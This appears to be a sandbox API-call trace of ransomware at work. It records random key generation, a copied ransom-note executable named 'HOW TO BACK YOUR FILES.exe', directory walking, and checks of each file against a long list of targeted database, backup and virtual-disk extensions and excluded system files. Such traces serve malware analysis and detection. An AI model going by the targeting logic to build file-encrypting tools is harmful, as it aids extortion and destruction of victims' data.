returned 0x154 [0058.173] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0058.174] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0058.174] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.174] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0058.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0058.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.175] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.175] CloseHandle (hObject=0x154) returned 1 [0058.175] CloseHandle (hObject=0x15c) returned 1 [0058.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0058.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.177] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d4c040, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49d4c040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0058.177] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0058.177] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d4c040, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49d4c040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0058.177] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0058.177] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2388 [0058.177] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories" [0058.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0058.177] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories") returned 53 [0058.177] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories" [0058.177] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.177] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\how to back your files.exe"), bFailIfExists=1) returned 0 [0058.178] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0058.178] GetLastError () returned 0x0 [0058.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0058.178] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0058.178] CloseHandle (hObject=0x118) returned 1 [0058.178] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0058.178] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.178] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d721a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d721a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.178] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.178] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.178] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.178] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d721a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d721a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.178] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.178] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0058.178] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.178] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.178] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e30880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e30880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="aoldtz.exe") returned -1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2=".") returned 1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="..") returned 1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="windows") returned -1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="bootmgr") returned -1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="temp") returned -1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="pagefile.sys") returned -1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="boot") returned -1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="ids.txt") returned -1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="ntuser.dat") returned -1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="perflogs") returned -1 [0058.179] lstrcmpiW (lpString1="Accessibility", lpString2="MSBuild") returned -1 [0058.179] lstrlenW (lpString="Accessibility") returned 13 [0058.179] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\*") returned 55 [0058.179] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Accessibility" | out: lpString1="Accessibility") returned="Accessibility" [0058.179] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0058.179] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9eb0 [0058.179] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2388 | out: ListHead=0x2e7710, ListEntry=0x2d2388) returned 0x2d2368 [0058.179] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a53d8cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2a53d8cd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Command Prompt.lnk", cAlternateFileName="COMMAN~1.LNK")) returned 1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="aoldtz.exe") returned 1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".") returned 1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="..") returned 1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="windows") returned -1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="bootmgr") returned 1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="temp") returned -1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="pagefile.sys") returned -1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="boot") returned 1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ids.txt") returned -1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ntuser.dat") returned -1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="perflogs") returned -1 [0058.179] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="MSBuild") returned -1 [0058.179] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0058.179] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility") returned 67 [0058.179] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Command Prompt.lnk" | out: lpString1="Command Prompt.lnk") returned="Command Prompt.lnk" [0058.179] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0058.180] lstrlenW (lpString="Ares865") returned 7 [0058.180] lstrcmpiW (lpString1="mpt.lnk", lpString2="Ares865") returned 1 [0058.180] lstrlenW (lpString=".dll") returned 4 [0058.180] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".dll") returned 1 [0058.180] lstrlenW (lpString=".lnk") returned 4 [0058.180] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".lnk") returned 1 [0058.180] lstrlenW (lpString=".ini") returned 4 [0058.180] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".ini") returned 1 [0058.180] lstrlenW (lpString=".sys") returned 4 [0058.180] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".sys") returned 1 [0058.180] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0058.180] lstrlenW (lpString="bak") returned 3 [0058.180] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.180] lstrlenW (lpString="ba_") returned 3 [0058.180] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.180] lstrlenW (lpString="dbb") returned 3 [0058.180] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.180] lstrlenW (lpString="vmdk") returned 4 [0058.180] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.180] lstrlenW (lpString="rar") returned 3 [0058.180] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.180] lstrlenW (lpString="zip") returned 3 [0058.180] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.180] lstrlenW (lpString="tgz") returned 3 [0058.180] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.180] lstrlenW (lpString="vbox") returned 4 [0058.180] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.180] lstrlenW (lpString="vdi") returned 3 [0058.180] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.180] lstrlenW (lpString="vhd") returned 3 [0058.180] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.180] lstrlenW (lpString="vhdx") returned 4 [0058.180] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.180] lstrlenW (lpString="avhd") returned 4 [0058.180] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.180] lstrlenW (lpString="db") returned 2 [0058.180] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.180] lstrlenW (lpString="db2") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.181] lstrlenW (lpString="db3") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.181] lstrlenW (lpString="dbf") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.181] lstrlenW (lpString="mdf") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.181] lstrlenW (lpString="mdb") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.181] lstrlenW (lpString="sql") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.181] lstrlenW (lpString="sqlite") returned 6 [0058.181] lstrcmpiW (lpString1="pt.lnk", lpString2="sqlite") returned -1 [0058.181] lstrlenW (lpString="sqlite3") returned 7 [0058.181] lstrcmpiW (lpString1="mpt.lnk", lpString2="sqlite3") returned -1 [0058.181] lstrlenW (lpString="sqlitedb") returned 8 [0058.181] lstrcmpiW (lpString1="ompt.lnk", lpString2="sqlitedb") returned -1 [0058.181] lstrlenW (lpString="xml") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.181] lstrlenW (lpString="$er") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.181] lstrlenW (lpString="4dd") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.181] lstrlenW (lpString="4dl") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.181] lstrlenW (lpString="^^^") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.181] lstrlenW (lpString="abs") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.181] lstrlenW (lpString="abx") returned 3 [0058.181] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.181] lstrlenW (lpString="accdb") returned 5 [0058.181] lstrcmpiW (lpString1="t.lnk", lpString2="accdb") returned 1 [0058.181] lstrlenW (lpString="accdc") returned 5 [0058.181] lstrcmpiW (lpString1="t.lnk", lpString2="accdc") returned 1 [0058.181] lstrlenW (lpString="accde") returned 5 [0058.181] lstrcmpiW (lpString1="t.lnk", lpString2="accde") returned 1 [0058.181] lstrlenW (lpString="accdr") returned 5 [0058.181] lstrcmpiW (lpString1="t.lnk", lpString2="accdr") returned 1 [0058.182] lstrlenW (lpString="accdt") returned 5 [0058.182] lstrcmpiW (lpString1="t.lnk", lpString2="accdt") returned 1 [0058.182] lstrlenW (lpString="accdw") returned 5 [0058.182] lstrcmpiW (lpString1="t.lnk", lpString2="accdw") returned 1 [0058.182] lstrlenW (lpString="accft") returned 5 [0058.182] lstrcmpiW (lpString1="t.lnk", lpString2="accft") returned 1 [0058.182] lstrlenW (lpString="adb") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.182] lstrlenW (lpString="adb") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.182] lstrlenW (lpString="ade") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.182] lstrlenW (lpString="adf") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.182] lstrlenW (lpString="adn") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.182] lstrlenW (lpString="adp") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.182] lstrlenW (lpString="alf") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.182] lstrlenW (lpString="ask") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.182] lstrlenW (lpString="btr") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.182] lstrlenW (lpString="cat") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.182] lstrlenW (lpString="cdb") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.182] lstrlenW (lpString="ckp") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.182] lstrlenW (lpString="cma") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.182] lstrlenW (lpString="cpd") returned 3 [0058.182] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.182] lstrlenW (lpString="dacpac") returned 6 [0058.183] lstrcmpiW (lpString1="pt.lnk", lpString2="dacpac") returned 1 [0058.183] lstrlenW (lpString="dad") returned 3 [0058.183] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.183] lstrlenW (lpString="dadiagrams") returned 10 [0058.183] lstrcmpiW (lpString1="Prompt.lnk", lpString2="dadiagrams") returned 1 [0058.183] lstrlenW (lpString="daschema") returned 8 [0058.183] lstrcmpiW (lpString1="ompt.lnk", lpString2="daschema") returned 1 [0058.183] lstrlenW (lpString="db-journal") returned 10 [0058.183] lstrcmpiW (lpString1="Prompt.lnk", lpString2="db-journal") returned 1 [0058.183] lstrlenW (lpString="db-shm") returned 6 [0058.183] lstrcmpiW (lpString1="pt.lnk", lpString2="db-shm") returned 1 [0058.183] lstrlenW (lpString="db-wal") returned 6 [0058.183] lstrcmpiW (lpString1="pt.lnk", lpString2="db-wal") returned 1 [0058.183] lstrlenW (lpString="dbc") returned 3 [0058.183] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.183] lstrlenW (lpString="dbs") returned 3 [0058.183] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.183] lstrlenW (lpString="dbt") returned 3 [0058.183] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.183] lstrlenW (lpString="dbv") returned 3 [0058.183] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.183] lstrlenW (lpString="dbx") returned 3 [0058.183] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.183] lstrlenW (lpString="dcb") returned 3 [0058.183] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.183] lstrlenW (lpString="dct") returned 3 [0058.183] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.183] lstrlenW (lpString="dcx") returned 3 [0058.183] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.183] lstrlenW (lpString="ddl") returned 3 [0058.183] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.184] lstrlenW (lpString="dlis") returned 4 [0058.184] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.184] lstrlenW (lpString="dp1") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.184] lstrlenW (lpString="dqy") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.184] lstrlenW (lpString="dsk") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.184] lstrlenW (lpString="dsn") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.184] lstrlenW (lpString="dtsx") returned 4 [0058.184] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.184] lstrlenW (lpString="dxl") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.184] lstrlenW (lpString="eco") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.184] lstrlenW (lpString="ecx") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.184] lstrlenW (lpString="edb") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.184] lstrlenW (lpString="epim") returned 4 [0058.184] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.184] lstrlenW (lpString="fcd") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.184] lstrlenW (lpString="fdb") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.184] lstrlenW (lpString="fic") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.184] lstrlenW (lpString="flexolibrary") returned 12 [0058.184] lstrcmpiW (lpString1="d Prompt.lnk", lpString2="flexolibrary") returned -1 [0058.184] lstrlenW (lpString="fm5") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.184] lstrlenW (lpString="fmp") returned 3 [0058.184] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.184] lstrlenW (lpString="fmp12") returned 5 [0058.184] lstrcmpiW (lpString1="t.lnk", lpString2="fmp12") returned 1 [0058.184] lstrlenW (lpString="fmpsl") returned 5 [0058.184] lstrcmpiW (lpString1="t.lnk", lpString2="fmpsl") returned 1 [0058.185] lstrlenW (lpString="fol") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.185] lstrlenW (lpString="fp3") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.185] lstrlenW (lpString="fp4") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.185] lstrlenW (lpString="fp5") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.185] lstrlenW (lpString="fp7") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.185] lstrlenW (lpString="fpt") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.185] lstrlenW (lpString="frm") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.185] lstrlenW (lpString="gdb") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.185] lstrlenW (lpString="gdb") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.185] lstrlenW (lpString="grdb") returned 4 [0058.185] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.185] lstrlenW (lpString="gwi") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.185] lstrlenW (lpString="hdb") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.185] lstrlenW (lpString="his") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.185] lstrlenW (lpString="ib") returned 2 [0058.185] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.185] lstrlenW (lpString="idb") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.185] lstrlenW (lpString="ihx") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.185] lstrlenW (lpString="itdb") returned 4 [0058.185] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.185] lstrlenW (lpString="itw") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.185] lstrlenW (lpString="jet") returned 3 [0058.185] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.186] lstrlenW (lpString="jtx") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.186] lstrlenW (lpString="kdb") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.186] lstrlenW (lpString="kexi") returned 4 [0058.186] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.186] lstrlenW (lpString="kexic") returned 5 [0058.186] lstrcmpiW (lpString1="t.lnk", lpString2="kexic") returned 1 [0058.186] lstrlenW (lpString="kexis") returned 5 [0058.186] lstrcmpiW (lpString1="t.lnk", lpString2="kexis") returned 1 [0058.186] lstrlenW (lpString="lgc") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.186] lstrlenW (lpString="lwx") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.186] lstrlenW (lpString="maf") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.186] lstrlenW (lpString="maq") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.186] lstrlenW (lpString="mar") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.186] lstrlenW (lpString="marshal") returned 7 [0058.186] lstrcmpiW (lpString1="mpt.lnk", lpString2="marshal") returned 1 [0058.186] lstrlenW (lpString="mas") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.186] lstrlenW (lpString="mav") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.186] lstrlenW (lpString="maw") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.186] lstrlenW (lpString="mdbhtml") returned 7 [0058.186] lstrcmpiW (lpString1="mpt.lnk", lpString2="mdbhtml") returned 1 [0058.186] lstrlenW (lpString="mdn") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.186] lstrlenW (lpString="mdt") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.186] lstrlenW (lpString="mfd") returned 3 [0058.186] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.186] lstrlenW (lpString="mpd") returned 3 